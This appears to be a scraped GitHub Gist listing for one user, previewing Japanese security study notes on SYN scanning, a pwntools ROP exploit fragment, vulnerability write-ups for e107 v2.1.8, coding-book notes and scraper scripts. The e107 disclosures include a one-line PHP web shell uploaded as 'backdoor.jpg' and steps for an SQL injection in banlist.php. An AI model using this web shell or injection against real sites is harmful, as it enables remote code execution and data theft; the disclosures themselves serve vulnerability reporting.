- SYNスキャンとTCPスキャン
- TCPスキャン
- スリーウェイハンドシェイクのシーケンスが実行される
- 通信が確立されてしまうので、ログに残りやすい
- SYNスキャン
- 完全なTCP接続の確立を行わない
- ハーフオープンスキャン、ステルススキャンとも呼ばれる
- SYNパケットを送りつけて、SYN/ACKが返ってきたら稼働中とする
- TCPスキャン
ommadawn46 ommadawn46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import sys | |
| username_addr = 0x6020C0 | |
| password_addr = 0x6020E0 | |
| call_printf_addr = 0x04009B6 | |
| pop_rdi = 0x0000000000400B03 # pop rdi ; ret | |
| with open("username_payload", "wb") as f: |
ommadawn46
/ GPEN学習メモ.md
Created
March 28, 2019 17:10
ommadawn46
/ e107_v2.1.8_MediaManager_bypass_filetype_check.md
Last active
September 7, 2018 10:45
e107 v2.1.8 MediaManager bypass filetype check
MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.
-
Login to the admin page (
/e107_admin/admin.php) and access MediaManager. -
Make a backdoor PHP file named "backdoor.jpg" to bypass JavaScript filter and select it on MediaManeger.
<?php system($_GET['q']) ?>
ommadawn46
/ e107_v2.1.8_Banlist_SQL_Injection.md
Last active
September 7, 2018 10:45
e107 v2.1.8 Banlist SQL Injection
e107 v2.1.8 contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /e107_admin/banlist.php script not properly escaping input to the old_ip parameter. This may allow a remote attacker to inject or manipulate SQL queries in the database, allowing for the manipulation or disclosure of arbitrary data.
- Login to the admin page. (
/e107_admin/admin.php) - Send a POST request to
/e107_admin/banlist.phpand use BurpSuite to rewrite parameters as follows.
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Classes
- ECMAScript 6で追加された
- 昔はprototypeを利用してクラス的な振る舞いをするオブジェクトを作成することが多かったが、class構文を使えば簡単にクラスを扱うことができる
class Polygon { constructor(height, width) { this.height = height;
ommadawn46
/ readable_code_chap13.md
Last active
September 24, 2023 06:54
ommadawn46
/ readable_code_chap9.md
Last active
June 26, 2018 12:10
ommadawn46
/ readable_code_chap4.md
Last active
June 22, 2018 01:42
ommadawn46
/ cto_challenge_level3.py
Last active
December 3, 2018 09:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from html.parser import HTMLParser | |
| from urllib.request import urlopen | |
| from datetime import datetime | |
| import json | |
| import csv | |
| import sys | |
| import re | |
| import os | |
| # エラーログのパス |
ommadawn46
/ cto_challenge_level2.py
Last active
December 3, 2018 09:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from html.parser import HTMLParser | |
| from urllib.request import urlopen | |
| from datetime import datetime | |
| import json | |
| import csv | |
| import sys | |
| import re | |
| # エラーログのパス | |
| ERRORLOG = 'error.log' |
NewerOlder